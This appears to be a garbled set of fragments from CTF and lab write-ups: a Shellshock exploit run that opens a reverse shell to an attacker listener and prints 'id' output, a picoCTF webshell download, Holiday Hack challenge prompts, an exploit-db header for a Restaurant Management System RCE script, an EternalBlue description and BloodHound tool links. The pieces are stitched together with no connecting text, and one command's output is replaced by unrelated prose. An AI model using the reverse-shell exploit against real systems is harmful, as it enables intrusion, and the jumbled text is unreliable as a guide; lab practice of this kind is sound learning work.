➜ sumo python shell_shock.py payload=reverse rhost=192.168.241.87 lhost=192.168.49.241 lport=6666 pages=/cgi-bin/test
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/test
[!] Successfully exploited
[!] Incoming connection from 192.168.241.87
192.168.241.87> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
192.168.241.87> whoami
Run the runme.py script to get the flag. Download the script with your browser or with wget in the webshell. Download runme.py Python script
oste-picoctf@webshell:~$ wget https://artifacts.picoctf.net/c/92/runme.py
--2022-01-12 20:51:52-- https://artifacts.picoctf.net/c/92/runme.py
Resolving artifacts.picoctf.net (artifacts.picoctf.net)... 99.84.248.96, 99.84.248.26, 99.84.248.60, ...
Connecting to artifacts.picoctf.net (artifacts.picoctf.net)|99.84.248.96|:443... connected.
HTTP request sent, awaiting response... 200 OK
Turn up the heat to defrost the entrance to Frost Tower. Click on the Items tab in your badge to find a link to the Wifi Dongle's CLI interface. Talk to Greasy Gopherguts outside the tower for tips.
Howdy howdy! Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!
Answer all the questions in the quizme executable:
# Exploit Title: Restaurant Management System 1.0 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Ibad Shah
# Script Modified by: 05t3 :twitter @oste_ke
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: N/A
# Tested on: Apache 2.4.41
#!/usr/bin/python
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."
You can read more about the exploit on Wikipedia or Avast's Blog
Bloodhound & neo4j https://bloodhound.readthedocs.io/en/latest/installation/linux.html
SharpHound https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
PowerView.ps1 can be downloaded here
For more functions, check out: